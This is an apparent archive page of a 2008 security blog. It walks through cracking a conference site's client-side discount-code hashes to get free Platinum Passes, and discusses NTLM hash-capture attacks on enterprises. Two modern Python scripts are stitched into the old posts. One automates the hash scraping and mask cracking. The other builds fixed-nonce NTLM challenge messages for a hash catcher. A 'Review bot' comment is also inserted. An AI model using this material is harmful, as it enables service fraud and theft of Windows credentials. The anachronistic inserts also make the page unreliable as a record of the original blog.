No cracks for you!<br /><br />So we can do a couple of things here:<br /><ul><li>Remember this next time and manually lowercase the usernames</li><br /><li>Tell the authors to modify the tools we use to grab the cache hashes</li><br /><li>Patch the tools ourselves (if we have the sources) and give them to the author</li><br /><li>Modify the cracking program to always lowercase the usernames<br /></li></ul><br />John The Ripper's source code is really easy to fix and the quickest to do so a simple diff against mscash_fmt.c:<br /><pre><br />--- mscash_fmt.c 2008-06-13 15:56:07.000000000 -0700<br />+++ mscash_fmt-lower.c 2008-06-13 15:55:49.000000000 -0700<br />@@ -16,6 +16,7 @@<br /> */<br /> <br /> #include <string.h><br />+#include <ctype.h><br /> <br /> #include "arch.h"<br /> #include "misc.h"<br />@@ -158,6 +159,9 @@<br /> <br /> l = strlen(ciphertext);<br /> strncpy(out, ciphertext + 2, l - PLAINTEXT_LENGTH + 1);<br />+ for(l=0; l < strlen(out); l++) {<br />+ out[l] = tolower(out[l]);<br />+ }<br /> return out;<br /> }<br /></pre><br /><br />And now I don't have to remember this every time! JTR will remember for me and with a cluster of 20 nodes all running around 600,000 cracks a second maybe SOMETHING will crack. 
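Review bot: in the second hunk the loop passes a plain <code>char</code> to <code>tolower()</code>; on targets where <code>char</code> is signed, a username byte of 0x80 or above becomes a negative argument, which is undefined behaviour for the <code>&lt;ctype.h&gt;</code> functions, so write <code>out[l] = tolower((unsigned char)out[l]);</code>, and hoist <code>strlen(out)</code> out of the loop condition instead of recomputing it every iteration. Worth a comment next to the loop as well: this lowercases ASCII letters only (and is locale dependent), whereas Windows lowercases the UTF-16 account name with its own case table, so accounts whose names contain non-ASCII letters will still be salted incorrectly after this patch.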
:)<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-79177291860274123872008-06-06T00:39:00.000-07:002008-06-06T01:02:46.696-07:00NTLM, DefCon and Java!John Heasman just <a href="http://heasman.blogspot.com/2008/06/stealing-password-hashes-with-java-and.html">posted a rocking method</a> of obtaining NTLM hashes out of an enterprise by turning a Java applet into a web server! Check it out!<br /><br />This year I'll be <a href="http://www.defcon.org/html/defcon-16/dc-16-speakers.html#Grutzmacher">presenting at DefCon</a> on the history of NTLM attacks, how they work and why we need to get rid of it. I'll release a tool that will combine as many hacks as I can get working to use captured users and their authentication tokens. There's been a lot of talk in the past few years about browser security and it's mostly hinged around using Javascript as a port scanner, sending attacks through the browser, attacking the platforms, etc. Few have been talking about an Enterprise-class risk and since that's what I get paid to think about I'm gonna blow it open. :) Come to DefCon and have a great time!<br /><br /><a href="http://www.syscan.org/">SyScan</a> was great, a little small but helpful to bring the confidence up speaking to people who have no clue who I am! I learned quite a bit about my speaking style which helped firm up ideas about the DefCon presentation. 
I presented a combination of Web Security Mistakes including how to get a <a href="http://grutztopia.jingojango.net/2008/01/another-free-macworld-platinum-pass-yes.html">free MacWorld pass</a> and spoke more about the future of <a href="http://grutz.jingojango.net/exploits/pokehashball.html">PokeHashBall</a>. <br /><br />We stayed a few extra days to soak up the culture and soak the sweat into our clothes some more since this was our first trip to Hong Kong. The <a href="http://www.12hk.com/area/Mongkok/MongkokComputerCentre.shtml">MongKok Computer Center</a> was interesting but didn't seem to really have the deals I was expecting. I didn't get to any of the other computer centers however. Maybe next trip!<br /><br />We went through Narita airport on the way back so I stopped at Duty Free and bought a bottle of Suntory Whiskey, the kind Bill Murray is hawking in the movie "Lost In Translation". For relaxing times, make it Santory time. . .<br /><br /><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/RdZt4BMfY3Q&hl=en"></param><embed src="http://www.youtube.com/v/RdZt4BMfY3Q&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object><br /><br />They have some of the greatest commercials.<br /><br /><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/YotCl8xcRtk&hl=en"></param><embed src="http://www.youtube.com/v/YotCl8xcRtk&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object><div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt 
Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-52328821456679034922008-05-26T16:14:00.000-07:002008-05-26T16:24:48.401-07:00Heading to SyScan Hong Kong<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.jaunted.com/files/admin/Hong_Kong_Golden_Toilet.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px;" src="http://www.jaunted.com/files/admin/Hong_Kong_Golden_Toilet.jpg" border="0" alt="" /></a><br /><br />I've been given the opportunity to talk about Web Security at this year's <a href="http://www.syscan.org/">SyScan conference</a> in Hong Kong. This is my first trip to Asia so I'm really really excited about it! I haven't traveled much outside of North America -- the trip to Chaos Camp was my first oceanic flight. The Pacific Ocean is so huge that our flight from SFO will total 17 hours! It was only 9 hours to Dusseldorf!<br /><br />This talk will expand on my OWASP talk on trusting the client and the <a href="http://grutztopia.jingojango.net/2008/01/another-free-macworld-platinum-pass-yes.html">MacWorld Pass hack</a>. I'll also give a brief bit on <a href="http://grutz.jingojango.net/exploits/pokehashball.html">NTLM Single Signon (NTLMSSP) attacks</a>. 
Looking forward and will update at the con!<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-28196076949954132552008-02-22T14:54:00.001-08:002008-02-22T15:20:04.892-08:00Your Client-Side Security SucksLast night I presented at the local OWASP chapter titled "Your Client-Side Security Sucks: STOP USING IT (as your only method of security)" and the turn-out was great. I met some really awesome people and the subject matter, while not cutting-edge research, appeared to hit home.<br /><br />We, as Web Application people, are still making some simple mistakes. This presentation highlighted three REAL WORLD examples of client-side security done incorrectly.<br /><br />The PDF slides are available <a href="http://grutz.jingojango.net/presentations/Your%20Client%20Security%20Sucks%20-%20OWASP.pdf">here</a> and soon I'll have a QuickTime video with a voiceover. I LOOOOOVE Keynote now! It has such useless transformations that you must pull back or else the content will be lost. How awesome is that? Plus exporting to a QuickTime so others can enjoy your ego-boosting flame build-in!<br /><br />Rumor has it there will be an OWASP regional conference in the near future so hopefully I'll present this again with some improved slides and other real world examples. If you have any examples but don't want to "go public" yourself, let me know and I'll share them. This is one of the first things you're supposed to learn as a web developer so I have no problem exposing others. 
JavaScript, Java and Flash do not equate to protection! Shoot me an e-mail.<br /><br />The second presenter, as luck would have it, is working on a tool exactly like I had done for NTLM relay attacks! We had a good chat about where we both saw our tools going in the future. It has renewed my energy in completing the <a href="http://grutz.jingojango.net/exploits/pokehashball.html">PokeHashBall tools</a><br />at least. Thanks, eric!<br />Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-72606767970859447612008-01-24T11:33:00.000-08:002008-01-24T11:38:10.108-08:00I Like Apple Products But I Am Not A MacHeadSome have asked whether, because I've picked on MacWorld, I am a <a href="http://www.macheadthemovie.com/">MacHead</a>. The answer is no, but I do like Apple products. 
This will be a fun movie to see as there certainly is a cult of Mac, especially here in the Bay Area.<br /><br /><div><object width="420" height="352"><param name="movie" value="http://www.dailymotion.com/swf/x44l1c"></param><param name="allowFullScreen" value="true"></param><param name="allowScriptAccess" value="always"></param><embed src="http://www.dailymotion.com/swf/x44l1c" type="application/x-shockwave-flash" width="420" height="352" allowFullScreen="true" allowScriptAccess="always"></embed></object><br /><b><a href="http://www.dailymotion.com/video/x44l1c_macheads-the-movie-trailer_tech">Macheads - the movie (trailer)</a></b><br /><i>Uploaded by <a href="http://www.dailymotion.com/brunogarattoni">brunogarattoni</a></i></div><div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-39783963172290427642008-01-14T23:06:00.001-08:002008-01-15T10:59:21.705-08:00Another Free MacWorld Platinum Pass? 
Yes in 2008!<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBNB3lwKCGYh2QJzjDXjEmXGw_nlKTKUrzYtFHocxn52Lm_iuSqP7jDbN6aHCKbZtPddyjmaYGYS5Fe35XncDRxp2hVEgzKQhw88yeW7qj6m50ZFDIFFreR-ROqdrLgW1Uc0LKQ/s1600-h/MacWorld2K8-badge.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBNB3lwKCGYh2QJzjDXjEmXGw_nlKTKUrzYtFHocxn52Lm_iuSqP7jDbN6aHCKbZtPddyjmaYGYS5Fe35XncDRxp2hVEgzKQhw88yeW7qj6m50ZFDIFFreR-ROqdrLgW1Uc0LKQ/s400/MacWorld2K8-badge.jpg" alt="" id="BLOGGER_PHOTO_ID_5155755059724095938" border="0" /></a><br />Last year at this time I <a href="http://grutztopia.jingojango.net/2007/01/your-free-macworld-expo-platinum-pass_11.html">disclosed an issue with the IDG/MacWorld Expo registration</a> that let people obtain free Platinum Passes (valued at $1,695). I reported the issue to IDG the week of MacWorld and they removed all the codes, fixed the site, and said thanks. They asked how to write better code and I gave them a few tips (don't trust user input, don't hand your secret codes to every visitor, hashing a guessable code does not keep it secret, etc). Did they listen?<br /><br />Nope.<br /><br /><insert badge="" picture=""><span style="font-style: italic;"><span style="font-weight: bold;">Why Do I Do This?</span></span><br /><br />Who wants to stand in line to see the Steve Jobs keynote at MacWorld? I mean have you SEEN the lines there? Really? I want to know WHAT'S IN THE AIR(tm)!!!<br /><br />Honestly it's academic to me. I didn't even go to the keynote. :P<br /><br /><span style="font-style: italic; font-weight: bold;">Getting Your Golden (Well, Blue) Ticket:</span><br /><br />This year the cost of a Platinum Pass has gone up to $1,895. 
That's a lot of money but you get a <a href="http://www.macworldexpo.com/about/packages_pricing">lot of cool things</a>:<br /></insert><ul><li>A free lunch every day</li><li>Free ticket to the MacWorld Blast</li><li>Seminars (MacWorld is more than just the keynote and Expo)</li><li>Priority Access Line to the Keynote</li></ul><insert badge="" picture="">You can see why it costs what it does. Last year the word "CREDIT" gave a 100% discount at checkout. These are called <a href="http://jeremiahgrossman.blogspot.com/2007/09/business-logic-flaws-freshly-minted.html">Application Logic Flaws</a>; they aren't new attacks, but they can be <a href="http://jeremiahgrossman.blogspot.com/2007/11/qvc-business-logic-flaw-nets-scammer.html">devastating</a>.<br /><br />Like last year, IDG sends the full list of valid Priority Codes to the browser as MD5 hashes and validates the code you type in JavaScript before any request goes to the server. Handing every visitor the hashes is only a problem if codes that give discounts are in that list and are easy to crack, so let's see if we can get lucky this year.<br /><br /><span style="font-weight: bold; font-style: italic;">Obtaining the codes -- Same as last year:</span><br /><br />Step 1. Navigate to the <a href="http://www.macworldexpo.com/registration/">main registration page</a><br />Step 2. Submit your initial data and view the source of the main registration page, then search for "Priority Code"<br />Step 3. See the JavaScript "onchange" handler? It calls "check_password()"<br />Step 4. Search for "check_password()" and you'll find the list of valid codes as MD5 hashes<br />Step 5. Format the data for your cracker of choice and start cracking!<br /><br /><span style="font-weight: bold; font-style: italic;">Cracking the codes:</span><br /><br />I like <a href="http://www.openwall.com/john/">John The Ripper</a> for all my hash cracking needs. It's flexible, easy to use and affordable! 
There are two main methods for cracking passwords in John: running a wordlist, or incrementing through a given keyspace. I always begin with a wordlist run just to kick out the quickies. The hash for "NONE" falls immediately, but we already know that code does nothing for us.<br /><br />Incremental mode is our next step. We know lower case letters aren't used, and a quick look at the configuration file turns up an external mode, "Filter_LanMan", that forces every candidate to upper case. Unfortunately a quick run through doesn't net any cracked hashes. There are still over 1,000 hashes to crack, so we have to be a bit more intelligent in our cracking (or throw more machines at it, wait longer, get a PS3, etc).<br /><br /><span style="font-weight: bold; font-style: italic;">A Brief Cracking Sidebar:</span><br /><br />Incremental cracking can take a long time. The size of your keyspace (<span style="font-style: italic;">k</span>) and the word length (<span style="font-style: italic;">l</span>) determine the total number of candidates (<span style="font-style: italic;">P</span>) that have to be hashed to try every string of that length: <span style="font-style: italic;">P=k^l</span>. Take your machine's benchmark rate in cracks per second (<span style="font-style: italic;">Cs</span>), do the math (<span style="font-style: italic;">P/Cs</span>) and you have the number of seconds an Incremental run over length <span style="font-style: italic;">l</span> takes.<br /><br />For example let's make <span style="font-style: italic;">k</span> = 69, <span style="font-style: italic;">l</span> = 8 and <span style="font-style: italic;">Cs</span> = 30 million:<br /></insert><blockquote face="courier new"> ((69^8)/30M) / 60 = 285,443.54 minutes (about 198 days, or six and a half months!)<br /></blockquote>Change <span style="font-style: italic;">l</span> for different lengths and the time changes accordingly:<br /><blockquote face="courier new"> ((69^7)/30M) / 60 = 4,136.86 minutes for 7 chars<br />((69^6)/30M) / 60 = 59.95 minutes for 6 chars</blockquote>and so on. . . 
The times add up (a run that covers lengths 1 through 8 costs the sum of each length's run) and those are just my numbers. Some have found ways to increase the speed to <a href="http://www.google.com/search?q=nick+breese+ps3">1 billion cracks-per-second</a>. Until that code is released or we write our own, we have to work with clusters of machines to reach that. My little cluster of 9 nodes does just about 60 million MD5s a second, so a full 8 character run would still take about 99 days, a bit over three months, to complete.<br /><br />Now that you know the math and the big mountain ahead of us, how can we get on the gondola that takes you over half of it without much effort? The answer is simple: vendor codes and keyword masking!<br /><br /><insert badge="" picture=""><span style="font-style: italic; font-weight: bold;">Here Come The Free Codes:</span><br /><br />Vendors each receive a batch of codes to pass along to their customers, potential customers, friends, family, etc. These typically provide only free Expo access, but maybe they'll help trim this mountain down to something manageable. The free codes get passed around like candy, so finding one takes a few <a href="http://www.google.com/search?q=macworld+priority+code">Google searches</a>. 
08-G-PC189, 08-G-PC178, 08-G-PC260,</insert> do you see the pattern?<br /><br /><span style="font-style: italic; font-weight: bold;">Time To Build An External Filter:</span><br /><br />Every vendor code is "08-", one letter, "-", then five more characters, so the mask is 08-?-????? with six unknown characters. Rather than brute-force all ten positions, we let Incremental generate only the six unknowns (MinLen = MaxLen = 6 over the 69-character LanMan set) and use an External filter to splice them into the fixed prefix and dash before each candidate is hashed. Time to add both sections to john.conf:<br /><blockquote style="font-family: courier new;"><pre>
[Incremental:MW]
File = $JOHN/lanman.chr
MinLen = 6
MaxLen = 6
CharCount = 69

[List.External:MW]
void filter()
{
	int i, c;

	// The codes are all upper case: clear bit 5 of any a-z character
	i = 0;
	while (c = word[i]) {
		if (c &gt;= 'a' &amp;&amp; c &lt;= 'z')
			word[i] &amp;= 0xDF;
		i++;
	}

	// Splice the six generated characters into the static mask 08-?-?????
	// Work from the end backwards so nothing is overwritten before it is
	// copied; add or remove moves here if you change the incremental length
	word[10] = 0;          // terminate the 10-character result
	word[9] = word[5];
	word[8] = word[4];
	word[7] = word[3];
	word[6] = word[2];
	word[5] = word[1];
	word[4] = '-';
	word[3] = word[0];
	word[2] = '-';
	word[1] = '8';
	word[0] = '0';
}
</pre></blockquote>With that, we run and wait...<br /><blockquote style="font-family: courier new;"><pre>
# john -i=MW -e=MW mw2k8.codes --format=raw-MD5
Loaded 1341 password hashes with no different salts (Raw MD5 [raw-md5 SSE2])
</pre></blockquote>.. but not for long, because the first code to fall looks REALLY interesting: 08-S-STAFF. 
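<br /><br />Before trying it in the browser, here is the whole pipeline from Steps 2 through 5 plus the sidebar arithmetic in one place, as an added Python example that is not the original post's code or anything IDG shipped. It scrapes the MD5 digests out of a constructed page snippet (the check_password() body, the hex_md5() helper, the priority_code field and the three sample codes are all made up to mirror what the post describes), writes them in the one-hash-per-line form that john --format=raw-MD5 loads, sizes the keyspace and run time the way the sidebar does, and then does in Python what the External filter does in john: expands a mask with a fixed "08-?-" prefix and runs the cheap vendor-shaped masks before anything approaching the full 69^6 keyspace. The "?a" class is assumed to be the same 69-character set (upper case, digits, punctuation and space) that lanman.chr covers.<br />

```python
import hashlib
import itertools
import re
import string

# Constructed stand-in for the registration page source.  The real page
# embedded a check_password() function comparing the MD5 of the entered
# Priority Code against a list of digests; hex_md5() is a hypothetical
# client-side helper.  The three codes are made up (a vendor code, the staff
# code and the placeholder "NONE") and hashed here so the sample is consistent.
_SAMPLE_CODES = ["08-G-PC189", "08-S-STAFF", "NONE"]
SAMPLE_PAGE_SOURCE = """
<script type="text/javascript">
function check_password(form) {
  var valid = new Array(%s);
  var digest = hex_md5(form.priority_code.value.toUpperCase());
  for (var i = 0; i < valid.length; i++) {
    if (valid[i] == digest) return true;
  }
  alert("Invalid Priority Code");
  return false;
}
</script>
""" % ", ".join('"%s"' % hashlib.md5(c.encode()).hexdigest() for c in _SAMPLE_CODES)

# Per-position character classes for a hashcat-style mask.  "?a" is assumed to
# be the 69-character set the post sizes its keyspace with (upper case letters,
# digits, punctuation and space, i.e. what john's lanman.chr covers).
MASK_SETS = {
    "u": string.ascii_uppercase,
    "d": string.digits,
    "a": string.ascii_uppercase + string.digits + string.punctuation + " ",
}


def extract_md5_hashes(page_source):
    """Step 4: every 32-hex-digit digest after the check_password() definition."""
    start = page_source.find("function check_password")
    if start < 0:
        raise ValueError("check_password() not found in page source")
    return [h.lower() for h in re.findall(r"\b[0-9a-fA-F]{32}\b", page_source[start:])]


def to_john_file(hashes):
    """Step 5: one digest per line, which john --format=raw-MD5 loads as-is."""
    return "".join(h + "\n" for h in hashes)


def mask_positions(mask):
    """Turn '08-?u-PC?d?d?d' into per-position alphabets (literals are one-character)."""
    positions, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in MASK_SETS:
            positions.append(MASK_SETS[mask[i + 1]])
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def keyspace(mask):
    """Candidates the mask expands to; for l positions of ?a this is the post's P = k^l."""
    n = 1
    for alphabet in mask_positions(mask):
        n *= len(alphabet)
    return n


def incremental_minutes(k, l, cps):
    """Minutes to hash all k^l candidates of length l at cps hashes/second: P / Cs / 60."""
    return k ** l / cps / 60


def expand_mask(mask):
    """Yield every candidate, as the External filter splices 08-?-????? together."""
    for combo in itertools.product(*mask_positions(mask)):
        yield "".join(combo)


def crack(hashes, candidates):
    """MD5 each candidate; return {digest: plaintext}, stopping once every target fell."""
    targets, found = set(hashes), {}
    for cand in candidates:
        digest = hashlib.md5(cand.encode()).hexdigest()
        if digest in targets and digest not in found:
            found[digest] = cand
            if len(found) == len(targets):
                break
    return found


def crack_with_masks(hashes, masks):
    """Run cheap vendor-shaped masks back to back before paying for the full keyspace."""
    return crack(hashes, itertools.chain.from_iterable(expand_mask(m) for m in masks))


if __name__ == "__main__":
    hashes = extract_md5_hashes(SAMPLE_PAGE_SOURCE)
    print(to_john_file(hashes), end="")
    print("full 08-?-????? keyspace:", keyspace("08-?a-?a?a?a?a?a"))
    print("69^8 at 30M/s: %.2f minutes" % incremental_minutes(69, 8, 30_000_000))
    for digest, code in crack_with_masks(hashes, ["08-?u-PC?d?d?d", "08-?u-STAFF"]).items():
        print(digest, code)
```

The point of running the masks in that order is the same as the filter above: 08-?u-PC?d?d?d is 26,000 candidates and 08-?u-STAFF is 26, while the honest 08-?-????? keyspace over 69 characters is 69^6, so the guessable vendor shapes fall in a blink and the long run is only needed for whatever is left.<br />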
Let's try it!<br /><br /><embed style="width:640px; height:480px;" id="VideoPlayback" type="application/x-shockwave-flash" src="http://video.google.com/googleplayer.swf?docId=-5737431513580266985&hl=en" flashvars=""> </embed><br />Download the <a href="http://grutz.jingojango.net/MacWorld2K8/MacWorld2K8.mov">High Quality</a> version.<br /><br />Voila. For the second year in a row, a free Platinum Pass in less than a day.<br /><br />On January 7th we noticed the MD5 hashes in the source code had changed. While the special code was still listed, it no longer gave a 100% discount when entered. Some codes still provide a small percentage discount and a few do provide a free Expo pass. We still have 14 codes left to crack, so there's no telling if those are any good. :)<br /><br />Thanks to <a href="mailto:bernsteinj%20%5B%5Bat%5D%5D%20gmail.com">Josh Bernstein</a> and <a href="http://ggee.org/">Garrett Gee</a> for reminding me MacWorld was coming up and independently confirming these findings.<br /><br />Maybe next year the problem will be fixed? Anyone in a betting mood? :)<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com8tag:blogger.com,1999:blog-28687371.post-61234277132192649842007-11-15T07:00:00.000-08:002007-11-15T07:45:20.224-08:00IE Trust ZonesThis week is the joint OWASP/WASC conference in San Jose: two days of web app nerds getting together and exchanging ideas about CSRF protections, web services, the Samy worm, etc. It's loads of fun! I'm a big OWASP supporter and push their information wherever possible. 
I'm always shocked when I hear "I've never heard of them" from a developer.<br /><br />Rsnake gave a presentation/rant about the sorry state of web security. Not that any of it was created out of malice, just that we're seeing issues today that were never part of the original concept of the web, the same way spam was never on the minds of Ray and Dick when they <a href="http://openmap.bbn.com/%7Etomlinso/ray/firstemailframe.html">created electronic mail</a>.<br /><br />He briefly mentioned one of my favorite topics - Windows hashes. Then I read his blog entry describing Natron's ideas for <a href="http://ha.ckers.org/blog/20071112/effects-of-dns-rebinding-on-ies-trust-zones/">using DNS rebinding (defeating the browser's DNS pinning) to land an attacker's host in the IE Intranet zone.</a> It's an area I had been thinking about but hadn't worked on yet because I was focused on the insider attack space. Awesome!<br /><br />Of course there are a few complications with the theory that have to be considered:<br /><ol><li>If the attacker's NTLM Type 2 (challenge) message doesn't name the domain the victim's computer is a member of, IE puts up a credential dialog box instead of authenticating silently. People may still type their passwords in, but the idea of mass, transparent authentication capture is gone.</li><li>IE Trust Zones are pretty awkward in design. What constitutes an Intranet Zone site? 
Microsoft <a href="http://support.microsoft.com/kb/174360">KB174360</a> says: <span style="font-style: italic;"> By default, the Local Intranet zone contains all of the network connections that were established by using a Universal Naming Convention (UNC) path, and Web sites that bypass the proxy server or have names that do not include periods (for example, http://local), provided that they are not assigned to either the Restricted Sites or Trusted Sites zone.</span></li><li>If the company uses a proxy server and you rebind a name that isn't fully qualified (no periods in it), the attacker's address may never be reached: IE treats the dotless name as local, skips the configured proxy and tries to connect directly to the attacker's IP address.</li></ol>Another option I was thinking of would be somehow creating a Java or Flash proxy server, but unfortunately their sandboxes have locked down any bind requests (unless someone has some mojo that gets around this). Flash doesn't support it and Java doesn't permit binds in applets.<br /><br />In any event the patch to Metasploit adding NTLM type-message parsing was submitted back in October. I have some updates to send in but it's still functional. The pre-defined nonce hash catcher (pokehashball.rb) script is fairly complete and the HTTP-to-POP3 tool (psyduck-pop3.rb) is fun to play with. None of these attacks have been incorporated into Metasploit modules yet but that's still on the radar (smb_relay via HTTP).<br /><br />Visit <a href="http://grutz.jingojango.net/exploits/pokehashball.html">http://grutz.jingojango.net/exploits/pokehashball.html</a> for the code.<br /><br />Full Disclosure: This attack was first documented by <a href="http://www.isecpartners.com/documents/NTLM_Unsafe.pdf">Jesse Burns at iSec Partners</a> using jCIFS. Where's your code, Jesse? 
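<br /><br />In the meantime, here is the piece of an HTTP hash catcher that the first complication turns on, as an added Python example that is neither PokeHashBall's nor Jesse's code: the NTLM Type 2 (challenge) message the attacker answers a Type 1 with. It is built with a pre-defined 8-byte nonce and a Target Name of your choosing, wrapped into the WWW-Authenticate header, and parsed back out so you can see exactly which domain and machine names a victim is being shown. A small is_local_intranet() helper encodes the KB174360 rule from the second and third complications so you can check whether a rebound host name would even land in the Intranet zone. The CORP/FILESRV names, the .local DNS names and the challenge bytes are constructed for the example.<br />

```python
import base64
import struct
from urllib.parse import urlsplit

# NTLMSSP negotiate flags needed for a minimal Type 2 (challenge) message
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_REQUEST_TARGET = 0x00000004
NTLMSSP_NEGOTIATE_NTLM = 0x00000200
NTLMSSP_TARGET_TYPE_DOMAIN = 0x00010000
NTLMSSP_NEGOTIATE_TARGET_INFO = 0x00800000

# AV_PAIR ids carried in the TargetInfo block
MSV_AV_EOL = 0
MSV_AV_NB_COMPUTER_NAME = 1
MSV_AV_NB_DOMAIN_NAME = 2
MSV_AV_DNS_COMPUTER_NAME = 3
MSV_AV_DNS_DOMAIN_NAME = 4

# A fixed ("pre-defined") server challenge: every captured response is then
# computed over the same 8 bytes, so one precomputed table covers all of them.
# Constructed value for the example, not one any real tool uses.
STATIC_CHALLENGE = bytes.fromhex("1122334455667788")
HEADER_LEN = 48  # Type 2 header without the optional Version field


def _utf16(s):
    return s.encode("utf-16-le")


def build_type2(domain, server, challenge=STATIC_CHALLENGE):
    """Build an NTLM Type 2 message that names `domain` as the target.

    Layout, all little-endian: 8-byte "NTLMSSP\\0", message type 2, TargetName
    (len, maxlen, offset), flags, 8-byte challenge, 8 reserved bytes, TargetInfo
    (len, maxlen, offset), then the payload the two descriptors point at.
    """
    if len(challenge) != 8:
        raise ValueError("server challenge must be exactly 8 bytes")
    flags = (NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_REQUEST_TARGET
             | NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_TARGET_TYPE_DOMAIN
             | NTLMSSP_NEGOTIATE_TARGET_INFO)
    target_name = _utf16(domain)
    # DNS names are derived from the NetBIOS names purely for the example
    pairs = [(MSV_AV_NB_DOMAIN_NAME, domain),
             (MSV_AV_NB_COMPUTER_NAME, server),
             (MSV_AV_DNS_DOMAIN_NAME, domain.lower() + ".local"),
             (MSV_AV_DNS_COMPUTER_NAME, server.lower() + "." + domain.lower() + ".local")]
    target_info = b"".join(struct.pack("<HH", av_id, len(_utf16(v))) + _utf16(v)
                           for av_id, v in pairs) + struct.pack("<HH", MSV_AV_EOL, 0)
    msg = b"NTLMSSP\x00" + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(target_name), len(target_name), HEADER_LEN)
    msg += struct.pack("<I", flags) + challenge + b"\x00" * 8
    msg += struct.pack("<HHI", len(target_info), len(target_info),
                       HEADER_LEN + len(target_name))
    return msg + target_name + target_info


def www_authenticate_header(msg):
    """Header value an HTTP catcher returns (with a 401) to provoke the Type 3."""
    return "NTLM " + base64.b64encode(msg).decode("ascii")


def parse_type2(msg):
    """Decode a Type 2 message into flags, challenge, target name and AV pairs."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLM Type 2 message")
    tn_len, _, tn_off = struct.unpack_from("<HHI", msg, 12)
    flags = struct.unpack_from("<I", msg, 20)[0]
    challenge = msg[24:32]
    ti_len, _, ti_off = struct.unpack_from("<HHI", msg, 40)
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "ascii"
    target_name = msg[tn_off:tn_off + tn_len].decode(enc)
    av_pairs, pos, end = {}, ti_off, ti_off + ti_len
    while pos + 4 <= end:
        av_id, av_len = struct.unpack_from("<HH", msg, pos)
        pos += 4
        if av_id == MSV_AV_EOL:
            break
        av_pairs[av_id] = msg[pos:pos + av_len].decode("utf-16-le")  # AV strings are always UTF-16
        pos += av_len
    return {"flags": flags, "challenge": challenge,
            "target_name": target_name, "av_pairs": av_pairs}


def parse_www_authenticate(header_value):
    """Inverse of www_authenticate_header(): decode the token and parse it."""
    scheme, _, token = header_value.partition(" ")
    if scheme.upper() != "NTLM" or not token:
        raise ValueError("not an NTLM WWW-Authenticate header")
    return parse_type2(base64.b64decode(token))


def is_local_intranet(url, proxy_bypass=()):
    """KB174360 rule of thumb: UNC paths, dotless names, and hosts that bypass the proxy."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if not host:
        return False
    if parts.scheme == "file":                  # file://server/share is a UNC path
        return True
    if host in {h.lower() for h in proxy_bypass}:
        return True
    return "." not in host                      # http://local, http://payroll, ...


if __name__ == "__main__":
    hdr = www_authenticate_header(build_type2("CORP", "FILESRV"))
    print(hdr)
    print(parse_www_authenticate(hdr))
    for u in ("http://payroll/", "http://payroll.corp.example.com/", "http://attacker.example.net/"):
        print(u, "Local intranet" if is_local_intranet(u) else "Internet")
```

Two things worth noticing when you run it: the Target Name and the MsvAvNbDomainName pair are what the victim's browser sees as "the domain", which is why the first complication matters, and is_local_intranet() says a rebound name only lands in the Intranet zone when it has no periods, which is exactly the case where IE will also skip the proxy. The Type 3 response, and what to do with the captured hash, is left to the reader.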
